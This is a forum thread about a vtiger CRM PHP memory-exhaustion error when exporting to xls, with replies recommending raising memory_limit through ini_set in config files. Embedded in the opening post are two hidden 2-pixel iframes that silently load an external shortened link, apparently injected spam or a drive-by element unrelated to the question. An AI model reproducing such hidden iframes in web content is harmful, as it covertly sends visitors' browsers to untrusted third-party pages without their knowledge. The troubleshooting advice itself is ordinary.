Hi
Im just a newbie here i just wanna ask I always having this error while exporting to xls.
*****************error snipet*****************
PHP Fatal error: Allowed memory size of 67108864 bytes exhausted (tried to allocate 84 bytes)
*********************************************
I already changed every memory setting in vtiger but the problem is still there
Can you help me to find a solution? <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;
Comments
ini_set('memory_limit','128m'); in the following files
config.inc.php and config.template.php
i was having the same problem & i can confirm that this works.
ini_set('memory_limit','512m');
and its works for me.
ini_set('memory_limit','512m');
and its works for me.
_________________
manish nautiyal
same here, it works, thanks
____________
rocky liu
i opened another post, before to land on this.
i indicate the other post here, because i had a bit different error, solved anyway!
<!-- l --><a class="postlink-local" href="http://forums.vtiger.com/viewtopic.php?f=104&t=40588">viewtopic.php?f=104&t=40588</a><!-- l -->
thanks to the team. <!-- s:-) --><img src="{smilies_path}/icon_smile.gif" alt=":-)" title="smile" /><!-- s:-) -->
lisa
thanks a million! <!-- s:d --><img src="{smilies_path}/icon_biggrin.gif" alt=":d" title="very happy" /><!-- s:d -->